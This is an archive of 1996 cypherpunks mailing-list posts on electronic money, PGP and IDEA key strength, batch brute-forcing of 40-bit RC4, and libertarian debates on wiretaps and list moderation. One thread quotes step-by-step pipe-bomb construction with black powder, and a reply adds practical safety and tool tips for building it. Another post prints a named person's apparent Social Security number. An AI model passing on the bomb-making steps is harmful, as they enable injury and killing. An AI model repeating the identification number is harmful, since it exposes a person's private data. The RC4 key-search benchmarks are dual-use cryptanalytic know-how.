> >    Associated Press
> [...]
> >   Gingrich, interviewed on NBC's "Meet the Press," said, "I think that
> >   we should have a provision that allows us to recognize that we now
> >   live in the age of the cellular telephone and allows us to track an
> >   individual person" He said the taggant requirement was "a
> >   possibility."

     Night of the long knives anyone? I'd bet Mr. Bell has a solution for 
this.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TrustBuckFella <TrustBuckFella@nowhere.com>
Date: Sat, 3 Aug 1996 17:43:45 +0800
To: cypherpunks@toad.com
Subject: TrustBucks
Message-ID: <64gf4trmj9@nowhere.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
An alternative model of electronic money.
 
Every model of electronic money I know of except one retains some degree
of centralization. There is always a central "mint", usually a bank. If
you can't find a bank that acts the way you want, you're SOL. And the
only thing that enforces non-abuse (inflation, etc) by the bank is the
equivalence of electronic money to some form of "real" money. The sole
exception is Digicash. Unfortunately, Digicash has no restraint on
infinite spending-into-debt.
 
I want to present an alternative model I call "TrustBucks". TrustBucks
is decentralized but zero-sum and needs no assistance from "real"
currency. Its central idea is a "web of trust": Local, trusted contacts
are linked in a web that at some remove can extend everywhere.
 
I'm not going to try to develop the cryptographic protocols for
TrustBucks. I haven't got the requisite paranoia and pickiness
(compliments both) for that. TrustBucks also has nothing in the way of
anonymity and restraint on double-spending right now. If you can see how
it could be anonymous or restrain double-spending and still work, please
feel free to add.
 
 
The basic rules of TrustBucks:
- -----------------------------------------------------------------
Each individual using TrustBucks has their own individual variety of
currency, notated here as TrustBucks( <name> ).
 
Each individual is considered to have an infinite supply of their
own TrustBucks.
 
Each individual accepts payment only in their own variety of TrustBucks.
 
There are only two fundamental operations with TrustBucks:
 
A and B swap TrustBucks, of any two varieties.
 
A pays B in TrustBucks( B ) for something external to the system.
 
 
- -----------------------------------------------------------------
 
Examples: Say Alice wants to pay Bob in TrustBucks, and Bob agreed to
accept payment in this form. Alice has several options for paying him.
 
*       Alice already has some TrustBucks( Bob ).
 
                Alice pays Bob.
 
*       The amount is small enough that Bob trusts Alice directly.
 
                Alice and Bob swap TrustBucks( Alice ) for TrustBucks( Bob )
                Alice pays Bob.
 
        I know this looks like an extra piece of complexity, but it's
        really not. By insisting that only TrustBucks( Bob ) are payment
        to Bob, we insure that Bob can't manipulate what currency he
        will accept to his advantage, which would otherwise be a
        problem. For instance, Bob cannot refuse to make good on his
        debts while accepting other people's money.
 
*       Alice doesn't have enough TrustBucks( Bob ), but does have
        TrustBucks( Carol ), and Bob trusts Carol directly for that
        amount.
 
                Alice and Bob swap TrustBucks( Carol ) for TrustBucks( Bob )
                Alice pays Bob.
 
*       Alice doesn't have enough TrustBucks( Bob ), but does have
        TrustBucks( Carol ), and Carol has some TrustBucks( Bob ).
 
                Alice and Carol swap TrustBucks( Carol ) for TrustBucks( Bob )
                Alice pays Bob.
 
*       Alice doesn't have enough TrustBucks( Bob ), and Carol has some
        TrustBucks( Bob ), and Carol trusts Alice directly.
 
                Alice and Carol swap TrustBucks( Alice ) for TrustBucks( Carol )
                Alice and Carol swap TrustBucks( Carol ) for TrustBucks( Bob )
                Alice pays Bob.
 
 
Using some combination of the above methods, Alice can pay Bob as long
as there are accessible parties in the system who, in total sum, trust
Alice for the amount of the payment, and there are accessible parties in
the system whom, in total sum, Bob is willing to trust for the amount of
his credit. Which gives the scheme its name: TrustBucks.
 
- -----------------------------------------------------------------------
 
Disadvantages:
 
        Lots of overhead.
 
        Third-party traders must be perpetually available.
 
        Not anonymous.
 
        Not clear how double-spending can be avoided.
 
Not a true disadvantage:
        It could "stall"; that is, there could be catch-22 situations
        where if only some people trusted to begin with, the system
        could continue, but not enough people trust each other to get it
        started. I say this is not a true disadvantage because the same
        thing happens in other currency-schemes, to an equal or larger
        degree. If it's merely more visible with TrustBucks, that should
        not be called a disadvantage. In practice, I think the
        threshhold of trust neccessary to start the system would be
        considerably with TrustBucks than with other systems.
 
Advantages:
        Decentralizable. It is not neccessarily decentraliz_ed_, but can
        become so as needed.
 
        Nobody controls the "mint".
 
        Few conceptual parts. When counting the parts in other schemes,
        don't forget to count the parts neccessary to fix or ameliorate
        problems that don't occur in TrustBucks, like deciding who
        "prints money", keeping them from abusing the role, stopping
        others (IE counterfeiters) from assuming the role, and so forth.
 
I don't claim that the above neccessarily adds up to a positive rating,
but it's worth hashing out, especially if it inspires more secure
protocols along the same decentralized lines.
 
 
- -----------------------------------------------------------------------
 
I'm not the first person to notice that decentralized ideas tend to take
off more abruptly and firmly. For instance, PGP vs. Kerberos, or the
internet vs. AOL, Prodigy, Compuserve. Especially Usenet and the WWW.
That's why I thought a long time about bringing this idea out. Once it's
out, it and its successors are beyond my control or anyone else's.
 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
 
iQCVAwUBMgLz8pi7GCxryNrZAQEfAAQApDzHN9PSpARe/MUZgDDk8F+eFLlKNAHZ
5H6KaX3SlWxL9itM8aFMoudpnBU2gAO7Kn9YHV+dFS1l/tE+NJDhSpTRL1EMKVw9
rGrL8lypX9bLsuw0+thMl1djJjQhc3To6qaLhJvZVji7TRXlKYuVMFW5D6Sm988a
Zg8nRsCQrIo=
=EOKl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 2 Aug 1996 17:10:45 +0800
To: Greg Broiles <gbroiles@netbox.com>
Subject: Re: A Libertine Question
In-Reply-To: <2.2.32.19960731130157.0069c420@mail.io.com>
Message-ID: <Pine.SV4.3.91.960802005945.11780D-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


We require people who have syphilis to divulge who their sex partners
were. I don't know if it's a good idea or not, but I haven't heard of any
activist movement against it in the past 80-odd years it's been in effect. 

We require property owners who don't have city-sewage hookups, to install 
their septic tanks and maintain them in certain defined configurations 
which estop them from contaminating the neighbor's well. I don't know if 
that's a good idea or not - but I haven't seen sentiment against sewage 
regulation of property owners.


So why should we be terribly upset about an ordinance which makes it 
illegal to operate a residential kitchen and a residential sewge-disposal 
operation in a city park or a city sidewalk?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David F. Ogren" <ogren@cris.com>
Date: Fri, 2 Aug 1996 20:13:34 +0800
To: cypherpunks@toad.com
Subject: Re: Is 1024-bit PGP key enough?
Message-ID: <199608020517.BAA12270@darius.cris.com>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Fri Aug 02 01:13:30 1996
>Somebody says:
>>> Is security provided by 1024-bit PGP key sufficient against 
most powerful
>>> computers that are available today? Say if smoe organization spent
 10
>>> billions of dollars on a cracking machine, would it be possible to
 crack 
>>> the keys in reasonable time?

I'll defer to Mr. Atkin's numbers here, although I think that TLA's may 
have more computing power than his rough estimates.  No matter what the 
exact numbers are, it seems that the answer is the same. 1024 bit keys 
appear to be secure for 1996, at least for individuals.

You also have to remember that even if a 1024 bit key could be cracked for 
a mere [sic] million dollars, you have succeeded in making it easier for an 
organization to break into your house and bug your computer than crack your 
RSA key. Or use some other method (bribery, extortion, violence) to obtain 
that information.

> Also, remember that although the PGP key is 1024 bits, it generates a
>  much
> smaller IDEA key with 56 bits (I think... anyone?).  The 56 bit key is
> vunerable to that $1 mil mystery machine that the NSA may or may not
>  have.
>  

IDEA keys are 128 bits long. (DES keys are the ones with 56 bits.) However, 
symmetric cryptosystems, such as IDEA, are harder to break by brute force. 
It is currently estimated that a 128 bit IDEA key is the equivalent of a 
2304 bit RSA key.

So, even though the 128 bit IDEA session key is shorter than the 1024 bit 
RSA key, the RSA key is easier to break using brute force.

- --
David F. Ogren                |
ogren@concentric.net          | "A man without religion is like a fish
PGP Key ID: 0x6458EB29        |  without a bicycle"
- ------------------------------|----------------------------------------
Don't know what PGP is?       | Need my public key?  It's available
Send a message to me with the | by server or by sending me a message
subject GETPGPINFO            | with the subject GETPGPKEY
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMgGOfOSLhCBkWOspAQEpzgf/Tn1gI8rjg+RxNbor9uIHMZgLWxGHcoMu
WleZrgd2O/K6JNcBySpeLCVe+xgUwbdXPThLO6jP4eSwqpuNtZTLWmaU2LZond+O
XIWSXRzEcvdFPoFISDpxLyLEJtZu122bc1xdlI8zhbO2CqeOcJmJ47WAaTul3wg7
MIyl7zZAvrXrzZ8ByYTpoG7C5d11kEeKCLw7ObxYXCaXXhWFphbxO8Kq3/C597H1
rb9cRu2zyt5OmN1ySMifTbrfMJvkeb9cNsSijv3q5m+ciIX5DKoH07kO82RxjT98
ndpyGbZkbZLWjKvDeNvrh2EtJRV6mfOIIZr2zaQyuyKlYmoP+VKuDA==
=QN4L
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 2 Aug 1996 11:51:54 +0800
To: stewarts@ix.netcom.com
Subject: Re: Cracking RC4/40 for massive wiretapps
In-Reply-To: <199608010603.XAA19276@toad.com>
Message-ID: <199608020034.BAA02423@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Bill Stewart <stewarts@ix.netcom.com> writes:
> But those designs are for one-at-a-time cracks.  An interesting question
> is whether you can speed up performance substantially by cracking
> multiple messages at once.

For known plaintext attack on pure RC4 this would work marvelously,
should get close to linear speed up I think as the greatest overhead
is the key setup.

This was discussed some during the netscape SSL break, it didn't apply
to 40 bit SSL because it was really 128 bit, just with 88 bits
disclosed, so the 88 bits functioned as a salt.  But it applies just
fine to pure RC4-40, ... or even to ECB DES...

This is interesting as applied to DES, does anyone have any banking or
funds transfer protocols handy which use DES in ECB mode :-)

Perhaps we could get DES down to a manageable number of bits, together
with the argument that the attacker wouldn't care who's money he stole.

> For instance, if you've got known plaintext, such as a standard
> header format saying "FooVoice" or "BEGIN DSA-SIGNED..", you can try
> many keys and compare them with _many_ cyphertexts, which may not
> slow down the FPGA very much.

Thinking of software attacks and RC4-40, if you were attacking pure
RC4-40, you would collect your 16k known-plaintext / ciphertext pairs,
xor them, and sort the xored texts and store them in some kind of
dictionary lookup structure .  Then you'd do the key schedule, then
traverse the btree with each byte that the RC4_encrypt_byte would have
xored with the text being encrypted.  As soon as you took a branch
which didn't exist in the btree you'd move on to the next key and
keyschedule.

[hacking interlude]

I got bored so I hacked up a test of this of the overheads of lookups,
using bsearch under linux I get lookups / sec against number of known
plaintexts:

  known	plaintext/
  ciphertext			actual		avg time to 
  pairs		lookups/s	keys/s	keys/s	find a key
  ========================================================
  16k		71k		23k	376M	24 mins
  8k		77k		24k	193M	48 mins
  4k		91k		25k	101M	1.5 hrs
  2k		100k		25k	52M	2.9 hrs
  1k		125k		27k	27M	5.6 hrs
  1		-		34k	34k	187 days

The tests were done on an AMD 486 dx/4 120 (a 120Mhz i486 clone), the
keys/s for pure rc4-40 are from a hand optimised assembly version
which I'd been playing with.

`actual keys' is the keys from the search space of 2^40.

`lookups/s' is the number of bsearches per second for the given sized
pre-xored table.  (Known plaintext xored with ciphertext allows the
check for correct key to be done with memcmp).

`keys/s' is the number of keys tested at once * the actual keys/s

`avg time..' is the expected time before find a key.

So based on one machine, if you had 1000 known plaintexts, you would
get a key in around 5 hours.  Multiply by 100 machines, some faster
some slower and it gets interesting.

Our only problem now is to find someone dumb enough to use pure RC4-40,

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 2 Aug 1996 21:03:12 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Brian quit the feds! [was:Re: Photo IDs]
Message-ID: <v02120d13ae275d20bcd2@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:51 8/1/96, Brian Davis wrote:

>No longer a federal prosecutor!

Congratulations, Brian. Though I will miss having a confessed 'real' Fed on
the list. Well, "former federal prosecutor" still sounds pretty good.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 2 Aug 1996 21:48:45 +0800
To: "Geoffrey C. Grabow" <gcg@pb.net>
Subject: Re: Is 1024-bit PGP key enough?
Message-ID: <199608020836.BAA05655@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:16 PM 8/1/96 -0400, "Geoffrey C. Grabow" <gcg@pb.net> wrote:
>Also, remember that although the PGP key is 1024 bits, it generates a much
>smaller IDEA key with 56 bits (I think... anyone?).  The 56 bit key is
>vunerable to that $1 mil mystery machine that the NSA may or may not have.

The PGP RSA keysize is user-selectable.
The IDEA key is not 56 bits (that's DES) - it's 128 bits,
and remember that you currently need to use brute force keysearch on it,
unlike RSA keys which have to be much longer because they 
have special forms and can be cracked by prime-number searching,
which is a much faster process that doesn't have to try
anything near to every 1024-bit number.

As somebody else pointed out, the 128-bit IDEA key is about as 
strong as a 3000-bit RSA key - though that was before the latest
factoring algorithm was demonstrated to work so well,
which means that it's probably about as strong as a 4-5000-bit RSA key.

> | That which does not kill us, makes us stranger.   - Trevor Goodchild |
:-)
#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 
#			Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 2 Aug 1996 20:58:27 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
Message-ID: <v02120d18ae2769138b69@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:06 8/1/96, David M. Rose wrote:
>On 1 Aug 1996 (Timothy C. May) wrote:
>
>>I'm with Duncan and Lucky on this one. Nations with a "Privacy Ombudsman"
>>are almost always nations with extensive files on individuals, their
>>habits, and their political activities.
>>
>>Having a "Privacy Ombudsman" is a bone thrown to the proles. I suspect a
>>police state like Singapore has such a person.
>
>My understanding is that the acceptable term is "ombud", or possibly
>"ombuds".  Cf.: "chair", "anchor", "milk", "post", "g-", "colored",  "fire",
>"police", "China", "French", etc.

Ombudsman is a Swedish term. I suppose the modern day English
deconstruction/reconstruction would be ombudsperson.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 2 Aug 1996 21:38:35 +0800
To: "Chris Adams" <cypherpunks@toad.com>
Subject: Re: Tolerance
Message-ID: <v02120d1aae276b170492@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 14:46 8/1/96, Chris Adams wrote:
>Just a comment to all of the 'true libertarians' out there, especially
>the "defend to the death" types:  How many of you defended Mr.
>Sternlight's recent membership?

There was nothing to defend. To the best of my knowledge, nobody suggested
that DS be thrown off the list. One joker unsubed Sternlight, but that was
hardly something that he couldn't fix himself. Did I want him on the list?
Hell no. Do I believe he has a right to join the list? Yes, with one
possible exception. The list owner can ban anybody, since the list is using
the owner's resources. In this case, from a libertarian standpoint, not
even an explanation of such an action would be required.



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Fri, 2 Aug 1996 17:50:29 +0800
To: Robin Powell <rpowell@algorithmics.com>
Subject: Re: "adjust your attitude with their billy club"
In-Reply-To: <96Aug1.115045edt.20493@janus.algorithmics.com>
Message-ID: <Pine.SV4.3.91.960802013310.11780G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Aug 1996, Robin Powell wrote:

> Burning toxic waste is intrisically damaging to other people,
> blasting your boombox is not (unless it is so loud as to actually
> cause ear damage to bystanders, but given the volume of music
> tolerated at rock concerts, I find this highly unlikely).


"Given the loss of privacy tolerated by 99.9999% of American citizens in 
the past twenty years, no one has a right to complain about the 
government taking new powers for itself."


You cannot have it both ways. If you are free to define what is or is not 
a public nuisance when you do it; likewise am I.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: daw@cs.berkeley.edu (David Wagner)
Date: Fri, 2 Aug 1996 23:38:33 +0800
To: cypherpunks@toad.com
Subject: [off-topic] roving wiretaps
In-Reply-To: <01I7RM0CJM388Y4XIK@mbcl.rutgers.edu>
Message-ID: <4tsfjm$oi6@joseph.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


In article <01I7RM0CJM388Y4XIK@mbcl.rutgers.edu>,
E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> wrote:
> 
> The Administration's proposal would also significantly expand current
> wiretapping authority to allow multi-point (or "roving") wiretaps. This
> would dramatically change surveillance authority to include wiretaps of
> INDIVIDUALS instead of LOCATIONS.
> 

I don't get it.  Help me out here-- how can this possibly be constitutional?

I'm reading the Fourth Amendment to our honored Constitution of the United
States, which proclaims

	[...]
	no warrants shall issue,
	but upon probable cause,
	supported by oath or affirmation,
	and *particularly describing the place to be searched*,
	and the persons or things to be seized.

Are we just to strike out that emphasized phrase?  What's going on here?
Someone tell me I'm not just having a bad nightmare.

Apologies if these are silly questions,
-- Dave Wagner

P.S.  Do police really need a search warrant to wiretap cellular phones?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Fri, 2 Aug 1996 21:59:41 +0800
To: cypherpunks@toad.com
Subject: Who the hell is ....
Message-ID: <2.2.32.19960802100835.0069d380@pop1.jmb.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

OK, I'v been on the list a bit now. I see a lot of the same
people posting to it, 
My question is " Who the Hell is Sternlight" At first I thought
it was a pen name ( the light on the end of a boat ?? )

Thanks
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMgHOEeJ+JZd/Y4yVAQEu4gQLB0BjGZB+ezonyMrzCEE4+FWA/l18CeLz
tIyRRuLiCKw/IO/sNAJeaCQP0D0IsFcMVnjs6rlQ5hiVX09+P4P8IlNfFjH6TdN0
HezEsU9yupltcNpje9PoxnGI38QgN3yQbjB06+xHf37KPxdIzBr+/7/pRyash5dl
z5StfU0SSZIhPg==
=cUAP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Fri, 2 Aug 1996 21:53:52 +0800
To: cypherpunks@toad.com
Subject: Re: Tolerance (fwd)
Message-ID: <199608021118.GAA09469@einstein>
MIME-Version: 1.0
Content-Type: text



Hi All,

Forwarded message:

> Date: Fri, 2 Aug 1996 01:35:00 -0700
> From: shamrock@netcom.com (Lucky Green)
> Subject: Re: Tolerance
> 
> Hell no. Do I believe he has a right to join the list? Yes, with one
> possible exception. The list owner can ban anybody, since the list is using
> the owner's resources. In this case, from a libertarian standpoint, not
> even an explanation of such an action would be required.

If the person joining the public list is warned that the list owner reserves
that right I would agree. It would require such a warning to be issued at
the time the person received their notification of successful joining. If
that warning is not present and the list is advertised as PUBLIC then NO,
not even the list operator can ethicaly refuse membership to anyone for
any reason other than criminal activity by a member. Otherwise it isn't
public.

Just because you provide a service does not give you unlimited or even
limited control if you make it clear it is public and therefore open to
anyone.

Libertarian views should be basicaly if it doesn't harm anothers person or
property without their prior consent then it should be legal and
permissible. A public list means that the owner does not reserve any rights
of moderation or cencorship. This is the way public is applied to the
government and it is the way it MUST be applied to private individuals.
This is a government of the people, by the people, and for the people. In
short the ethical situation is the same as if a city declares a park to be
public and then begins to bar people from sleeping there at night.


                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 2 Aug 1996 21:43:57 +0800
To: cypherpunks@toad.com
Subject: Re: Southern Cracker Beer Bombs in Trucks (fwd)
Message-ID: <199608021124.GAA09477@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

I work with Hi Performance and Experimental rockets and I am somewhat
familiar with explosives and the handling thereof. I have a couple of
comments to add to the pipe bomb building thread...

Forwarded message:

> Date: Thu, 01 Aug 1996 23:06:14 -0800
> From: jim bell <jimbell@pacifier.com>
> Subject: Re: Southern Cracker Beer Bombs in Trucks
> 
> >Buy a section of metal water pipe 1/2 by 6 inches long, threaded on both
> >ends.  Buy two metal caps to fit.  These are standard items in hardware
> >stores.  Drill a 1/16th hole in the center of the pipe. This is easy with a
> >good drill bit. Hanson is a good brand to use.  Screw a metal cap tightly
> >on one end. Fill the pipe to within 1/2 inch of the top with black powder.
> >Do not pack
> >the powder. Don't even tap the bottom of the pipe to make it settle.  You want
> >the powder loose.  For maximum explosive effect, you need dry, fine powder
> >sitting loose in a very rigid container.
> 
> For "safety" purposes (at least for the builder!) I would add that the 
> threads on the pipe should be covered with a generous quantity of vaseline, 
> grease, wax, or other similar material.  Otherwise, the final tighten-up 
> might cause an explosion if granules of powder get stuck in the threads and 
> ignite due to friction.

Do this and you will get a reaction which can cause a spontaneous explosion.
In short keep all greases and other such products away from explosives. If
you must use threads on a pipe in such a situation make VERY shure they are
clean and dry. I would use water to first wash the water solubles away and
then would use alcholol to clean the threads of the remaining debree.
Also, always use a cotten rag otherwise you run the risk of building up a
static charge sufficient to set it off.

> When tightening the pipe/cap, shield the work with a thick layer of 
> folded-up paper towel or other material, so your Vice-Grips (or other such 
> wrench, or vice) don't leave "tool marks" on the pipe.  (Discard, by burning, such paper after use.)

If you must use metal tools in the constructio of your bomb make shure of
two things. First, there is another person to call the ambulance. Also be
shure to use a non-sparking tool (read that as expensive) do NOT use steel
or iron tools. You would just be asking to blow yourself up from sparks.
Most tool catalogs will have a small section of Beryllium based tools or
something similar.

                                              Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 2 Aug 1996 22:11:51 +0800
To: cypherpunks@toad.com
Subject: Re: "adjust your attitude with their billy club" (fwd)
Message-ID: <199608021128.GAA09487@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 01:36:56 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: "adjust your attitude with their billy club"
> 
> "Given the loss of privacy tolerated by 99.9999% of American citizens in 
> the past twenty years, no one has a right to complain about the 
> government taking new powers for itself."
> 
> You cannot have it both ways. If you are free to define what is or is not 
> a public nuisance when you do it; likewise am I.

			AMENDMENTS TO THE CONSTITUTION 
 
	Articles in addition to, and Amendment of the Constitution of the 
United States of America, proposed by Congress, and ratified by the 
Legislatures of the several States, pursuant to the fifth Article of the 
original Constitution. 
 
 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 
 
 
				ARTICLE X. 
 
	The powers not delegated to the United States by the Constitution, 
nor prohibited by it to the States, are reserved to the States respectively, 
or to the people. 
 
 
 
[The first ten amendments went into effect on 15 December 1791.] 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 2 Aug 1996 22:05:32 +0800
To: cypherpunks@toad.com
Subject: Re: A Libertine Question (fwd)
Message-ID: <199608021135.GAA09497@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 01:13:26 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: A Libertine Question
> 
> We require people who have syphilis to divulge who their sex partners
> were. I don't know if it's a good idea or not, but I haven't heard of any
> activist movement against it in the past 80-odd years it's been in effect. 

Clear and present danger to possibly unknowing persons lives. People have a
right to know if their sex partners have communicable diseases. In the case
of a 'Typhoid Mary' type disease then everyone has a right to know that
person is infected.

> We require property owners who don't have city-sewage hookups, to install 
> their septic tanks and maintain them in certain defined configurations 
> which estop them from contaminating the neighbor's well. I don't know if 
> that's a good idea or not - but I haven't seen sentiment against sewage 
> regulation of property owners.

Clear and present danger. Once a well is contaminated that contamination can
spread through the whole local water table and infect hundreds if not
thousands of people with disease without warning.

> So why should we be terribly upset about an ordinance which makes it 
> illegal to operate a residential kitchen and a residential sewge-disposal 
> operation in a city park or a city sidewalk?

As long as they have a license to operate a food dispencing facility (in
other words they are certifying they are aware of the correct processes for
such operations) then nobody should have the right to interfere with their
operation unless with probable cause (ie proof of danger such as bad weenies
in their hot dogs). This would not apply to individuals or families making
such food in the same place for their own and NOT public consumption.

A person or group has a right to swing their fists all they want, just not
in my face. This also applies to the government which is nothing more than
our elected representatives. We also can not give them rights we ourselves
don't posses.

                                                    Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 2 Aug 1996 22:00:56 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports (fwd)
Message-ID: <199608021138.GAA09504@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Aug 1996 18:53:57 -0700 (MST)
> From: drose@AZStarNet.com (David M. Rose)
> Subject: Re: Internal Passports
> 
> OK.  But I sure would like to have an automatic weapon for
> self/home/"national" defense w/o going through a tremendous amount of B.S.
> (as Israelis are excused from).  I believe that you Texans and we Arizonans
> have the privilege; in "urban" states, where the need truly is, good luck.

We have to go through the same BS that you do to get automatic weapons.

> Also, I don't know what your experience in the Middle East is.  Me, I worked
> in Iran and exited just before the Jan. '79 "revolution".  Menace & murder.
> You *really* have no idea.  Hint:  I'm alive.
> 
> If you still (I don't know your age) think that humans are all the same, but
> we juss gots diffrunt colors 'n' cultures, I *strongly* recommend an
> extended period of travel to the third world.

I do and I have.


                                                     Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Fri, 2 Aug 1996 20:15:05 +0800
Subject: Re: A funny thing happend to my data on the way to the bank
In-Reply-To: <199608011745.KAA19325@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.95.960802063901.24383A-100000@netcom9>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 1 Aug 1996 anonymous-remailer@shell.portal.com wrote:

> 172-42-6111, according to the Boston  Consulting Group in Massachusetts,
> which employed Netanyahu for about one-year during 1979-80.=20

	It was around then that the Social Security Administration
	was issuing advisories that Social Security Numbers not
	be used for identification purposes, because of errors 
	made in isseing the numbers.

	Specifically, 5% of the numbers were issued to two or more
	people.  3% of numbers were issued to people who allready
	had one or more numbers.  A further 3% to 5%  were issued
	in error for other reasons.

        xan

	Illiterate: adj.  Inability to read write or speak five 
	or less languages.
	Funksioneel Ongeleerd:  a.  Die wat kon nee elf or meer tale 
	lees, skryf and gesprek. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 2 Aug 1996 23:01:01 +0800
To: cypherpunks@toad.com
Subject: Re: "adjust your attitude with their billy club" (fwd)
Message-ID: <199608021218.HAA09568@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Fri, 2 Aug 1996 01:36:56 -0400 (EDT)
> From: Alan Horowitz <alanh@infi.net>
> Subject: Re: "adjust your attitude with their billy club"
> 
> "Given the loss of privacy tolerated by 99.9999% of American citizens in 
> the past twenty years, no one has a right to complain about the 
> government taking new powers for itself."
> 
> You cannot have it both ways. If you are free to define what is or is not 
> a public nuisance when you do it; likewise am I.

To the first comment, numerical superiority is not sufficient reason in a
democracy to justify actions by that democracy. One of the basic ideas
behind  democracy is that certain aspects of individuals are inherent and
uncontrollable by that democracy (ie rights). To my mind democracy is the
only form of government which recognizes a priori that everyone is not alike
and therefore will want different things. This can be said of no other form
of government which treats persons as identical cogs in a government
machine. In short, democracy is not mob rule however much the majority might
like that idea. I would say that the first comment above can be said another
way,

"If you have been raped once then you should not complain any about
subsequent rapes." 

Clearly utter bullshit. This is pure and simple victim-speak.

As to the second, you are not free to define public nuisance, only nuisances
to yourself. The burden of proof rests on the individual to prove that such
actions by a third party are a public nuisance. For something to be a public
nuisance its effects MUST extend to property or persons other than the
instigator AND it must be shown that damage occurs without prior permission.
Simply because they do something that irks you does not make it public let
alone a nuisance.


                                               Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 2 Aug 1996 23:07:16 +0800
To: cypherpunks@toad.com
Subject: Re: Internal Passports
In-Reply-To: <v02120d18ae2769138b69@[192.0.2.1]>
Message-ID: <XR71RD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) writes:
>
